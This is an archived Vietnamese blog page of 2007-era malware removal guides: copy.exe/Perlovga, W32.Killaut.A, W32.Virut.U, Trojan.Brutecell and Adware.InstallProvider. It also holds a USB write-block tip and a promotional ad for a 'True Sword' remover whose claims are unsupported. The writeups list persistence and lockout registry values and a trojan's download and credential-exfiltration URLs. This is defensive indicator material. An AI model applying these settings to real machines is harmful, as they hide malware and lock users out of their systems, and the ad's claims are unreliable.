copy.exe

What is copy.exe?

Copy.exe is one of possible names of Salga-A worm also known as Perlovga virus (usually classified as win32.Perlovga.A). Other possible file names of this worm include host.exe, xcopy.exe, temp1.exe, temp2.exe and svchost.exe. Copy.exe is dangerous to your system threat and it should be removed immediately. Some anti viruses remove it improperly which causes "can not find copy.exe" error message to appear.

Why do you see "Cannot open drive C, D, E. etc. Windows cannot find copy.exe" error?

Copy.exe worm (or Salga-A, or Perlovga virus which is the same) copies its references to autorun.inf files of different drives and creates subkeys inside HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerMountPoints2 key which makes this file to be default Autorun handler for all drives in your system (local drives like C, D, E, etc, CD/DVD-ROMs, removable drives like USB drive and so on). So when you double click on some drive Copy.exe file is executed by Windows. If you delete Copy.exe file itself, "copy.exe missing" error when accessing drives will appear. You can however still access your drives by right-clicking on them and selecting Open but this is very inconvenient. Fortunately, you will find the complete copy.exe problem solution on this page.

How to fix Copy.exe error?
Quick Solution:

Use our award winning program - True Sword - to repair copy.exe file error. True Sword will find and eliminate this problem and more than 180 000 other dangerous threats including trojans, spyware, adware, riskware, problemware, keyloggers, dialers and other kinds of malicious programs in several seconds. Fast, easy, and handy, True Sword protects your computer against malicious programs that do harm to your computer and break your privacy. True Sword scans your hard disks and registry and destroys any manifestation of such malicious programs. Standard anti-virus software can do nothing against privacy breakers and malicious programs like that. Get rid of trojans, spyware, adware, trackware, dialers and keyloggers in one click now!

Download True Sword now for free

How to fix Copy.exe missing problem manually? For advanced users only

To completely solve "Cannot open drive... Windows cannot find copy.exe" problem you should:

1) Kill all processes related to copy.exe trojan (including but not limited to host.exe, xcopy.exe, temp1.exe, temp2.exe and svchost.exe)

2) Delete all files related to copy.exe trojan (including but not limited to host.exe, xcopy.exe, temp1.exe, temp2.exe and svchost.exe)

3) Clear all references to Copy.exe virus from Autorun.inf files on all drives or simply delete these files (please note, that this may stop some other useful autorun functionality of drives)

4) Delete subkeys under HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerMountPoints2 key which are created by Copy.exe file virus.

This is long but effective way of Copy.exe repair.

If you are not sure which files and registry keys to delete, download this Copy.exe file remover that will scan for and fix "windows can not find copy.exe" error.

được đăng bởi THDao @ 00:20 0 Nhận xét

Nguồn: Tổng hợp

07/08/2007

Một vài trường hợp, bạn có dữ liệu quan trọng và không muốn cho người khác copy sang USB. Hãy thực hiện như sau: 1. Start ---> Run ---> gõ Regedit, hộp thọai Registry sẽ hiện ra. Mở registry, tìm tới khóa sau: HKEY_LOCAL_MACHINESystemCurrentControlSetControlStorageDevicePolicies Lưu ý: Khóa StorageDevicePolicies có thể không có, bạn có thể tạo ra bằng cách click chuột phải vào khỏang trắng , chọn New ---> key, sau khi tạo xong, ở khung bênh phải của key, chọn New ---> DWORD có tên là WriteProtect và gán cho nó giá trị là 1! Restart lại máy! Khi có người cắm USB vào máy của bạn và copy thì sẽ nhận đc thông báo như hình trên . Cảnh báo: - Chỉ dùng cho những máy tính không muốn chia sẻ dự liệu. - Nếu muốn chia sẻ lại, xóa key vừa tạo và restart lại máy.

được đăng bởi THDao @ 00:19 0 Nhận xét

Kill Virus

Cách diệt sâu W32.Killaut.A

Phát hiện: September 12, 2007
Cập nhật: September 12, 2007 5:45:49 PM
Kiểu: Worm
Có kick thước khoảng : 264,088 bytes
Những hệ thống bị ảnh hưởng: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Vista, Windows XP

Khi nhiễm Trojan sẽ gây ra một số hoạt động sau
• %UserProfile%My Documents[CURRENT USER ACCOUNT].exe
• %System%debug_32.exe
• %System%MsMpEng.exe
• %Windir%TasksAt1.job
• %Windir%TasksAt2.job
• %Windir%Tasksdmadmin_1.exe
• %Windir%compmgmt.exe
Tiếp theo nó sẽ khởi tạo file sau
%UserProfile%My Documents[FolderName].exe
Sau đó nó sẽ tìm kiếm tất cả các ổ đĩa cứng khởi tạo và đặ thuộc tính cho tất cả các folder
%SystemDrive%[FolderName].exe
• %SystemDrive%autorun.inf
%SystemDrive%New_Folder.exe
Sau đó sẽ khởi tạo vào trong regedit và sẽ chạy cũng mỗi khi Windows bắt đâu khởi động sẽ khóa một số tính năng
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShell Icons"3" = "63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 63 00 6F 00 6D 00 70 00 6D 00 67 00 6D 00 74 00 2E 00 65 00 78 00 65 00 2C 00 30 00 00 00 74"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerrun"compmgmt.exe " = "63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 64 00 65 00 62 00 75 00 67 00 5F 00 33 00 32 00 2E 00 65 00 78 00 65 00 00 00 00"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun"Shell" "63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 63 00 6F 00 6D 00 70 00 6D 00 67 00 6D 00 74 00 2E 00 65 00 78 00 65 00 00 00 07"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun"Sheli" = "63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 74 00 61 00 73 00 6B 00 73 00 5C 00 64 00 6D 00 61 00 64 00 6D 00 69 00 6E 00 5F 00 31 00 2E 00 65 00 78 00 65 00 00 00 00"
• HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSchedule"AtTaskMaxHours" = "0x00000048"
• HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSchedule"AtTaskMaxHours" = "0x00000048"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"NoFolderOptions" = "0x00000001"
• HKEY_CURRENT_USERControl Paneldon't load"appwiz.cpl" = "6E 00 6F 00 00 00 00"
• HKEY_CURRENT_USERControl Paneldon't load"Services.cpl" = "6E 00 6F 00 00 00 00"
• HKEY_CURRENT_USERControl Paneldon't load"Startup.cpl" = "6E 00 6F 00 00 00 00"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"NoFolderOptions" = "0x00000001"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"NoRun" = "0x00000001"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"NoFind" = "0x00000001"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"NoFileMenu" = "0x00000001"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerrun"Sheli" = "63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 74 00 61 00 73 00 6B 00 73 00 5C 00 64 00 6D 00 61 00 64 00 6D 00 69 00 6E 00 5F 00 31 00 2E 00 65 00 78 00 65 00 00 00 00"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"DisableRegistryTools" = "0x00000001"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"DisableTaskMgr" = "0x00000001"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"NoDriveTypeAutoRun" = "0x00000001"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp"Disabled" = "0x00000001"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun"Sheli" = "63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 74 00 61 00 73 00 6B 00 73 00 5C 00 64 00 6D 00 61 00 64 00 6D 00 69 00 6E 00 5F 00 31 00 2E 00 65 00 78 00 65 00 00 00 00"
• HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerInfodeliveryRestrictions"{default}" = "00 00 C3"
• HKEY_LOCAL_MACHINESOFTWAREClasses.reg"(default)" = "74 00 78 00 74 00 66 00 69 00 6C 00 65 00 00 00 05"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHidden"ValueName" = "53 00 68 00 6F 00 77 00 53 00 75 00 70 00 65 00 72 00 48 00 69 00 64 00 64 00 65 00 6E 00 00 00 03"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHiddenPolicyDontShowSuperHidden"(default)" = "00 00 C3"
• HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"Userinit" = "43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 75 00 73 00 65 00 72 00 69 00 6E 00 69 00 74 00 2E 00 65 00 78 00 65 00 2C 00 63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 74 00 61 00 73 00 6B 00 73 00 5C 00 64 00 6D 00 61 00 64 00 6D 00 69 00 6E 00 5F 00 31 00 2E 00 65 00 78 00 65 00 00 00 39"
• HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBoot"AlternateShell" = "63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 4D 00 73 00 4D 00 70 00 45 00 6E 00 67 00 2E 00 65 00 78 00 65 00 00 00 05"
• HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot"AlternateShell" = "63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 4D 00 73 00 4D 00 70 00 45 00 6E 00 67 00 2E 00 65 00 78 00 65 00 00 00 05"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced"Hidden" = "0x00000002"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced"HideFileExt" = "0x00000001"
• HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced"ShowSuperHidden" = "0x00000000"
•
• HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel"Connection Settings" = "0x00000001"
• HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel"ConnectionsTab" = "0x00000001"
• HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel"GeneralTab" = "0x00000001"
• HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel"HomePage" = "0x00000001"
• HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel"Settings" = "0x00000001"
• HKEY_USERSS-1-5-18SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"NoFolderOptions" = "0x00000001"
• HKEY_LOCAL_MACHINESOFTWAREClassesDirectoryshellfind
• HKEY_LOCAL_MACHINESOFTWAREClassesFoldershellexplore
• HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot
Khi Windows khởi động thì các file sau cũng hoạt động cùng
• sp_rsser.exe
• avgupsvc.exe
• sp_rssrv
• avg7alrt

Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
1. Click Start > Run.
2. Type regedit
3. Click OK.

HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerShell Icons"3" = "63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 63 00 6F 00 6D 00 70 00 6D 00 67 00 6D 00 74 00 2E 00 65 00 78 00 65 00 2C 00 30 00 00 00 74"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionpoliciesExplorerrun"compmgmt.exe " = "63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 64 00 65 00 62 00 75 00 67 00 5F 00 33 00 32 00 2E 00 65 00 78 00 65 00 00 00 00"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun"Shell" "63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 63 00 6F 00 6D 00 70 00 6D 00 67 00 6D 00 74 00 2E 00 65 00 78 00 65 00 00 00 07"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun"Sheli" = "63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 74 00 61 00 73 00 6B 00 73 00 5C 00 64 00 6D 00 61 00 64 00 6D 00 69 00 6E 00 5F 00 31 00 2E 00 65 00 78 00 65 00 00 00 00"
HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSchedule"AtTaskMaxHours" = "0x00000048"
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSchedule"AtTaskMaxHours" = "0x00000048"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"NoFolderOptions" = "0x00000001"
HKEY_CURRENT_USERControl Paneldon't load"appwiz.cpl" = "6E 00 6F 00 00 00 00"
HKEY_CURRENT_USERControl Paneldon't load"Services.cpl" = "6E 00 6F 00 00 00 00"
HKEY_CURRENT_USERControl Paneldon't load"Startup.cpl" = "6E 00 6F 00 00 00 00"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"NoFolderOptions" = "0x00000001"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"NoRun" = "0x00000001"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"NoFind" = "0x00000001"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"NoFileMenu" = "0x00000001"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerrun"Sheli" = "63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 74 00 61 00 73 00 6B 00 73 00 5C 00 64 00 6D 00 61 00 64 00 6D 00 69 00 6E 00 5F 00 31 00 2E 00 65 00 78 00 65 00 00 00 00"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"DisableRegistryTools" = "0x00000001"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"DisableTaskMgr" = "0x00000001"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem"NoDriveTypeAutoRun" = "0x00000001"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp"Disabled" = "0x00000001"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun"Sheli" = "63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 74 00 61 00 73 00 6B 00 73 00 5C 00 64 00 6D 00 61 00 64 00 6D 00 69 00 6E 00 5F 00 31 00 2E 00 65 00 78 00 65 00 00 00 00"
HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerInfodeliveryRestrictions"{default}" = "00 00 C3"
HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel"Connection Settings" = "0x00000001"
HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel"ConnectionsTab" = "0x00000001"
HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel"GeneralTab" = "0x00000001"
HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel"HomePage" = "0x00000001"
HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel"Settings" = "0x00000001"
HKEY_USERSS-1-5-18SoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer"NoFolderOptions" = "0x00000001"
HKEY_LOCAL_MACHINESOFTWAREClasses.reg"(default)" = "74 00 78 00 74 00 66 00 69 00 6C 00 65 00 00 00 05"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHidden"ValueName" = "53 00 68 00 6F 00 77 00 53 00 75 00 70 00 65 00 72 00 48 00 69 00 64 00 64 00 65 00 6E 00 00 00 03"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvancedFolderSuperHiddenPolicyDontShowSuperHidden"(default)" = "00 00 C3"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon"Userinit" = "43 00 3A 00 5C 00 57 00 49 00 4E 00 44 00 4F 00 57 00 53 00 5C 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 75 00 73 00 65 00 72 00 69 00 6E 00 69 00 74 00 2E 00 65 00 78 00 65 00 2C 00 63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 74 00 61 00 73 00 6B 00 73 00 5C 00 64 00 6D 00 61 00 64 00 6D 00 69 00 6E 00 5F 00 31 00 2E 00 65 00 78 00 65 00 00 00 39"
HKEY_LOCAL_MACHINESYSTEMControlSet001ControlSafeBoot"AlternateShell" = "63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 4D 00 73 00 4D 00 70 00 45 00 6E 00 67 00 2E 00 65 00 78 00 65 00 00 00 05"
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot"AlternateShell" = "63 00 3A 00 5C 00 77 00 69 00 6E 00 64 00 6F 00 77 00 73 00 5C 00 73 00 79 00 73 00 74 00 65 00 6D 00 33 00 32 00 5C 00 4D 00 73 00 4D 00 70 00 45 00 6E 00 67 00 2E 00 65 00 78 00 65 00 00 00 05"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced"Hidden" = "0x00000002"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced"HideFileExt" = "0x00000001"
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced"ShowSuperHidden" = "0x00000000"

4. Khôi phục và chỉnh sửa regedit

HKEY_LOCAL_MACHINESOFTWAREClassesDirectoryshellfind
HKEY_LOCAL_MACHINESOFTWAREClassesFoldershellexplore
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSafeBoot

5. Exit the Registry Editor.

Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt W32.Virut.U

Phát hiện: September 6, 2007
Cập nhật: September 6, 2007 2:55:41 PM
Kiểu: Virus
Có kick thước khoảng : 10,496 bytes
Những hệ thống bị ảnh hưởng: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Vista, Windows XP
Khi nhiễm Trojan sẽ gây ra một số hoạt động sau
Nó sẽ lây nhiễm và khởi tạo file sau
Vx_4
Tiếp theo nó sẽ tìm kiếm tất cả những file có đuôi mở rộng là .exe and .scr
Nó sẽ lây lan và khởi tạo hàm với những tên như sau
• PSTO
• WC32
• WCUN
• WINC
Tiếp theo nó sẽ khởi tạo vào trong regedit và sẽ chạy cũng mỗi khi Windows bắt đâu khởi động
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorer"TargetHost
Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt sâu Trojan.Brutecell

Phát hiện: September 7, 2007
Cập nhật: September 7, 2007 8:11:30 AM
Kiểu: Trojan
Có kick thước khoảng : 62,464 bytes
Những hệ thống bị ảnh hưởng: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003, Windows Vista, Windows XP
Khi nhiễm Trojan sẽ gây ra một số hoạt động sau
Nó sẽ copy "TNSH2006660099-SQYPL" và sẽ khởi động cùng Windows…
Tiếp tục sẽ download từ URLs sau
[http://]205.209.142.140/lt/bbconfirm28/getreco[REMOVED]
[http://]205.209.142.140/lt/bbconfirm28/getreco[REMOVED]
[http://]205.209.142.140/lt/bbconfirm28/getreco[REMOVED]
Ghi chú: Sẽ tìm kiếm những file chứa usernames and passwords.
Tiếp theo nó sẽ thử đăng nhập tới Ebay và sử dụng eBay API để vượt qua
https://api.ebay.com/ws/api.dll.
Nó sẽ gửi kết quả mà nó vừa tìm đựoc tới
[http://]205.209.142.140/lt/bbconfirm28/stored[REMOVED]
Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
Tắt và rỡ bỏ những dịch vụ không cần thiết. Theo mặc định như hệ điều hành, thiết đặt lại những dịch vụ mà không phải FTP server, telnet, và web server.
- Nếu những lời đe dọa cùng với việc khai thác những dịch vụ mạng, vô hiệu hóa hoặc truy nhập tới những dịch vụ ứng dụng mạng.
- Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên những máy chủ có những dịch vụ co thể tiếp cận xuyên qua Firewall, thí dụ HTTP, FTP, mail và dịch vụ DNS. (thí dụ: Tất cả các máy tính trên Windows cần phải có các dịch vụ hiện thời được cài đặt). Đồng thời, hãy áp dụng bất kỳ những sự cập nhật an toàn nào mà đáng tin cậy hoặc trên những Website của nhà cung cấp.
- Bắt buộc phải có mật khẩu, những mật khẩu phức tạp làm cho nó khi can thiệp vào những files trên máy tính.
- Những email của máy chủ nhiễm virut, để ngăn chặn bỏ email mà chứa đựng những files có sử dụng đuôi: (.vbs, .bat, .exe, .pif and .scr).
- Cô lập những máy tính bị lây lan nhanh. Thực hiện một sự phân tích khôi phục những máy tính sử dụng phương tiện truy nhập thông tin được tin cậy.
- Bạn hãy vào một website để downloaded những phần mềm diệt virut ở trên Internet
Cách diệt:
1. Vô hiệu hóa Hệ thống khôi phục (Windows Me/XP)
2. Cài đặt chương trình quét virut và cập nhật phiên bản mới nhất
Norton AntiVirus 2006, Symantec AntiVirus Corporate Ọdition 10.0
Hoặc Norton AntiVirus 2005, Symantec AntiVirus Corporate Ọdition 9.0
3. Chạy và quét toàn bộ hệ thống.
a. Khởi động chương trình Symatec của bạn và cho quét tất cả các files.
b. Chạy một hệ thống đầy đủ và quét
Translate Vansuc_nguyen@yahoo.co.uk

Cách diệt Adware.InstallProvider

Cập nhật: July 24, 2007 3:56:00 PM
Kiểu: Adware
Có kick thước khoảng :
Những hệ thống bị ảnh hưởng: Windows 98, Windows 95, Windows XP, Windows Me, Windows NT, Windows Server 2003, Windows 2000

Khi nhiễm Trojan sẽ gây ra một số hoạt động sau
• C:Documents and Settings[CURRENT USER]Cookies[CURRENT USER]@84.243.251[2].txt
• C:Documents and Settings[CURRENT USER]Local SettingsTemp[RANDOM FILE NAME].exe
• C:Documents and Settings[CURRENT USER]Local SettingsTemp[RANDOM FOLDER NAME]Installer.exe
• C:Documents and Settings[CURRENT USER]Local SettingsTemp[RANDOM FOLDER NAME]InstallOptions.dll
• C:Documents and Settings[CURRENT USER]Start MenuProgramsInstall ProviderInstallProvider.url
• C:Program FilesInstall Providerdata.ini
• C:Program FilesInstall ProviderInstall Provider.ico
• C:Program FilesInstall ProviderInstallProvider.dll
• C:Program FilesInstall ProviderInstallProvider.dlldat
Tiếp theo nó sẽ khởi tạo và thêm khóa vào regedit
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{A9344DE7-59F2-40F8-9AE7-C203B67444DA}
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{A9344DE7-59F2-40F8-9AE7-C203B67444DA}InProcServer32
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{BBA0C39A-46D8-436D-BF53-6FB84997BC6E}
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{BBA0C39A-46D8-436D-BF53-6FB84997BC6E}InprocServer32
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{F93C5BFF-16F9-4DC5-B78C-EC46F896EE56}
HKEY_LOCAL_MACHINESOFTWAREClassesCLSID{F93C5BFF-16F9-4DC5-B78C-EC46F896EE56}InprocServer32
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerBrowser Helper Objects{F93C5BFF-16F9-4DC5-B78C-EC46F896EE56}
HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionUninstallInstall Provider
HKEY_LOCAL_MACHINESOFTWAREMicrosoftDownloadManager
HKEY_LOCAL_MACHINESOFTWAREInstall Provider
HKEY_ALL_USERSSoftwareMicrosoftWindowsCurrentVersionExtStats{A9344DE7-59F2-40F8-9AE7-C203B67444DA}
HKEY_ALL_USERSSoftwareMicrosoftWindowsCurrentVersionExtStats{F93C5BFF-16F9-4DC5-B78C-EC46F896EE56}
HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerDownloadUI: "{BBA0C39A-46D8-436D-BF53-6FB84997BC6E}"
HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet ExplorerToolbar{A9344DE7-59F2-40F8-9AE7-C203B67444DA}
HKEY_ALL_USERSSoftwareMicrosoftInternet ExplorerDownloadUI: "{BBA0C39A-46D8-436D-BF53-6FB84997BC6E}"
HKEY_ALL_USERSSoftwareMicrosoftInternet ExplorerToolbarWebBrowser{A9344DE7-59F2-40F8-9AE7-C203B67444DA}
Tiếp theo nó sẽ khởi tạo trên thanh toolbar một thanh công cụ tìm kiếm Nó sẽ link đến một số địa chỉ để đánh lừa ngừời dùng
Những khuyến cáo:
- Đáp lại sự an toàn Symantec khuyến cáo tất cả những người người sử dụng và người quản trị để tham gia vào sự an toàn của hệ thống :
